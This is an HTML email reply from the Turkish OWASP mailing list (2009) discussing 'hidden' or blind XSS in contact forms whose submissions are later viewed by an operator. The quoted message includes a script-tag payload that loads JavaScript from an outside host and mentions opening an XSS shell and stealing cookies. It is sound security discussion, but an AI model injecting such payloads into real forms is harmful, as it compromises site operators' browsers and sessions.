<html>
<head>
<style><!--
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
font-size: 10pt;
font-family:Verdana
}
--></style>
</head>
<body class='hmmessage'>
&nbsp;<BR>
Selamlar,<BR>
&nbsp;<BR>
Ben yaklasik 2 yil kadar once ayni konuda blogda yazmistim, ama gecenlerde blog uctugu icin&nbsp;o yazi da tarih olmustu.<BR>
&nbsp;<BR>
Simdi arsivlerden cikarip tekrar ekledim : <A href="http://www.h-labs.org/blog/?p=47">http://www.h-labs.org/blog/?p=47</A><BR>
&nbsp;<BR>
Isimlendirme konusunda Blind XSS diye dusunmustum :)<BR><BR><BR><FONT color=#0033ff>Mesut TİMUR<BR></FONT><FONT color=#0033ff><A href="http://www.h-labs.org/"><U><FONT color=#0000ff>http://www.h-labs.org</FONT></U></A>&nbsp;<BR></FONT><FONT color=#0033ff>GYTE Bilgisayar Mühendisliği</FONT><BR><BR><FONT color=#000000>Türkçe Web Uygulaması Güvenliği E-Posta Listesine üye olmak için:</FONT><FONT color=#0033ff><BR><A href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</A><BR><BR></FONT><BR><BR><BR><BR>&nbsp;<BR>&gt; Date: Wed, 21 Oct 2009 18:28:24 +0300<BR>&gt; From: denizcev@gmail.com<BR>&gt; To: owasp-turkey@lists.owasp.org<BR>&gt; Subject: [Owasp-turkey] Gizli XSS'ler<BR>&gt; <BR>&gt; Selam arkadaşlar,<BR>&gt; <BR>&gt; Bildiğiniz üzere genel olarak XSS'ler 3 kategoriye ayrılıyor, Stored,<BR>&gt; Reflected ve Dom-Based. Bu XSS tiplerini webapp scanner yazılımları<BR>&gt; ile bulmak oldukça kolay. Ancak bunlar dışında kullanıcı girdisini<BR>&gt; alan fakat girilen bilgileri görüntülemeyen, çıktı olarak "bilgiler<BR>&gt; elimize ulaştı, eyvallah..." gibisinden mesajlar üreten uygulamalar da<BR>&gt; belkide yukarıdakilerden daha ciddi sıkıntılar oluşturabilecek XSS<BR>&gt; saldırılarından etkilenebiliyor.<BR>&gt; <BR>&gt; Özellikle yazılımcılar kullanıcı girdilerinden çıktı üreten sayfalarda<BR>&gt; XSS kontrollerini etkin bir şekilde yapmasına rağmen, bu tip<BR>&gt; sayfalarda bu kontrolleri yapmayı göz ardı edebiliyorlar. İletişim<BR>&gt; formları, bize ulaşın gibi formlar aracılığı ile yollanan bilgiler bir<BR>&gt; operator tarafından yine browser ile erişilen bir arabirimle<BR>&gt; işleniyorsa, operator browserinde istenilen scriptleri çalıştırmak<BR>&gt; mümkün olabilir. Uygulamalardaki bu tip problemleri ise otomatik<BR>&gt; tarama araçları ile tespit etmek malesef mümkün değil. Üstelik<BR>&gt; genellikle yerel ağa erişim, cms arabirimine erişim cookilerini<BR>&gt; toplama gibi ciddi sorunlar ile karşılaşılabiliyor.<BR>&gt; <BR>&gt; Bu tip problemleri tespit etmek için &lt;SCRIPT<BR>&gt; SRC="http://www.site.com/xss.jpg"&gt;&lt;/SCRIPT&gt; gibi ifadeleri parametre<BR>&gt; değeri olarak yollayıp, kendi web sitemizin loglarına bakarak erişim<BR>&gt; olup olmadığını kontrol edip, ilgili uygulamanın XSS açığından<BR>&gt; etkilenip etkilenmediğini belirleyebiliriz. Benzer şekilde XSS shell<BR>&gt; açmakda mümkün olabilir. :=) Bu xss yöntemi bir stored xss tipi olarak<BR>&gt; nitelendirilebilir sanırım ama gizli xss diye adlandırmak daha hoş<BR>&gt; duruyor.<BR>&gt; <BR>&gt; Son günlerde bu problemlerle çok sık karşılatığım ve göz ardı<BR>&gt; edildiğini gördüğüm için sizlerle paylaşmak istedim.<BR>&gt; <BR>&gt; İyi Çalışmalar.<BR>&gt; _______________________________________________<BR>&gt; Owasp-turkey mailing list<BR>&gt; Owasp-turkey@lists.owasp.org<BR>&gt; https://lists.owasp.org/mailman/listinfo/owasp-turkey<BR>                                               <br /><hr />Hotmail: Free, trusted and rich email service. <a href='http://clk.atdmt.com/GBL/go/171222984/direct/01/' target='_new'>Get it now.</a></body>
</html>